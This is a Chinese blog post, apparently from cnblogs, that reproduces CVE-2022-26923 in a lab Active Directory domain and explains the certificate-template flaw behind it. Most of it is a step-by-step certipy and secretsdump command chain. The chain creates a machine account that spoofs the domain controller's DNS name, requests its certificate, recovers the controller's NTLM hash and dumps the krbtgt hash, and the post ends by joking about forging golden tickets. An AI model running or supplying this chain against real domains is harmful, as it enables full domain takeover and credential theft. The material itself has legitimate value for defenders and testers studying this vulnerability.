首页 > 其他分享 >CVE-2022-26923 从普通域账户到Krbtgt

CVE-2022-26923 从普通域账户到Krbtgt

时间:2022-08-18 12:04:58浏览次数:86  
标签:证书 Krbtgt 125.156 Machine 2022 172.16 CVE 模板 属性

靶机环境搭建

  • 域控DC(需要安装证书服务):172.16.125.156
  • 攻击机Kali:172.16.125.157
  • 域控普通账户:zhangsan/zs1234567890*
  • 攻击工具:

靶机域控安装证书服务关键

攻击过程

漏洞信息收集

certipy find -debug -u [email protected] -p "zs1234567890*" -dc-ip 172.16.125.156

注册机器账号

certipy account create -u "[email protected]" -p "zs1234567890*" -dc-ip 172.16.125.156 -user "machinetestcymm" -dns "dc01.sec.com" -debug

注册机器账号证书

sudo certipy req -u "machinetestcymm$" -p "rFQeKXLCmmDQ5MuZ" -dc-ip 172.16.125.156 -ca sec-dc01-ca -template Machine -debug

获取机器账号NTLM-Hash

certipy auth -pfx dc01.pfx -dc-ip 172.16.125.156 -debug

获取Krbtgt的NTLM-Hash

python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:69eb46ed2b60a1c81bcc9fb09ffe9cfc "sec.com/dc01\[email protected]"  -just-dc-user krbtg

后记

然后该做啥大家应该都清楚了吧,哈哈哈哈,黄金票据啊直接上。

原理

默认情况下:

  • 域用户注册 User 证书模板;
  • 域计算机注册 Machine 证书模板。

这两个证书模板都允许客户端身份验证。当用户账户申请 User 模板证书时,使用UPN(用户名@AD域名)这个唯一ID嵌入到证书中以进行识别,User 证书模板的 msPKI-Certificate-Name-Flag 属性存在一个 CT_FLAG_SUBJECT_ALT_REQUIRE_UPN 标志位,其指示 CA 将来自 Active Directory 中请求者用户对象的 UPN 属性值(用户名@AD域名)添加到已颁发证书的主题备用名称中。

而Machine证书模板没有UPN属性,但Machine证书模板的 msPKI-Certificate-Name-Flag 属性还存在一个 CT_FLAG_SUBJECT_ALT_REQUIRE_DNS标志位,其指示 CA 将从 Active Directory 中请求者用户对象的 DNS 属性获得的值添加到已颁发证书的主题备用名称中。

而这个dNSHostName属性值并不唯一,通过User用户创建Machine账户,将Machine账户(具有写入权限)的dNSHostName值改为与域控制器的计算机账户相同的dNSHostName值,欺骗AD CS申请到域控制器的AD证书。但SPN属性具有唯一性,它包含dNSHostName,如果dNSHonstName发生改变会带动servicePrintcipalName的RestrictedKrbHost和Host发生改变,由于唯一性会发生报错,所以想要漏洞完成漏洞要删除账户中的servicePrincipalName属性值。

参考链接

标签:证书,Krbtgt,125.156,Machine,2022,172.16,CVE,模板,属性
From: https://www.cnblogs.com/KevinGeorge/p/16598187.html

相关文章

  • 2022年军队文职面试中问题以及需要注意的细节有哪些!!!
    阅前说明:1、报考的岗位是软件开发岗(技术岗)不是这个岗位小伙伴直接看最后提示就好了,信我一定会对你有帮助的。2、岗位报考率1:5最后进入面试的只有4个人,我排在第3位。(笔......
  • 融会贯通,并行不悖 | 2022年8月《中国数据库行业分析报告》精彩抢先看!
    为了帮助大家及时了解中国数据库行业发展现状、梳理当前数据库市场环境和产品生态等情况,从2022年4月起,墨天轮社区行业分析研究团队出品将持续每月为大家推出最新《中国数......
  • 2022-08-18 第二小组 张晟源 数据库
    数据库一,MySql常用函数聚合函数count()min()max()sum()avg()数值型函数主要是对数值型进行处理ceiling(x):向上取整floor(x):向下取整round(x):四舍五入trunc......
  • IOI2022 数字电路
    第一次体验当年IOI的题(虽然是Day2的签到)这题有一个经典的套路——在一些计数DP题,我们不直接统计方案数,而是统计出现合法方案的概率。这样我们设\(dp(i)\)表示子树\(i\)内......
  • 【2022.8.17】MySQL数据库(4)
    学习内容概要操作表的SQL语句补充表查询关键字selectfromwheregroupbyhavingdistinctorderbylimitregexpSQL语句中也支持写类似......
  • 2022-08-17 第五组 罗佳明 学习笔记
    一、学习重点子查询(自连接)标量子查询:结果集只有一行一列(单行子查询)列子查询:结果集有一列多行行子查询:结果集一行多列表子查询:结果集多行多列日期格式二、学习内容......
  • 【IELTS】-2022.8.17开始
    【120】-irrelevant-不相关的,离题的--TheSellercanaskamoderatortoremoveanyirrelevantcommentsfromtheirthread.卖家也可以要求管理员删去任何离题的评语......
  • 20220817 第一组 于芮 mysql数据库查询(第三十四天)
     小白成长记——第三十四天   今天主要学习了mysql数据库的查询语句,对于一个合格的程序猿来说,掌握数据库的查询语句是非常重要的,所以今天不仅学习了理论知识,还作了......
  • 20220806-第八组-王凌霄-学习笔记
    List:数据是有顺序(添加的先后顺序)的,数据是可以重复的ArrayList:内部结构是数组,比较适合做高频率的查找、遍历LinkedList:双向链表,比较适合做高频率的新增和删除继承和实现......
  • 2022-8-17数据库查询联系
    DQL查询语言子查询按照结果集的行列数不同,子查询可以分为以下几类:标量子查询:结果集只有一行一列(单行子查询)列子查询:结果集有一列多行行子查询:结果集有一行多列......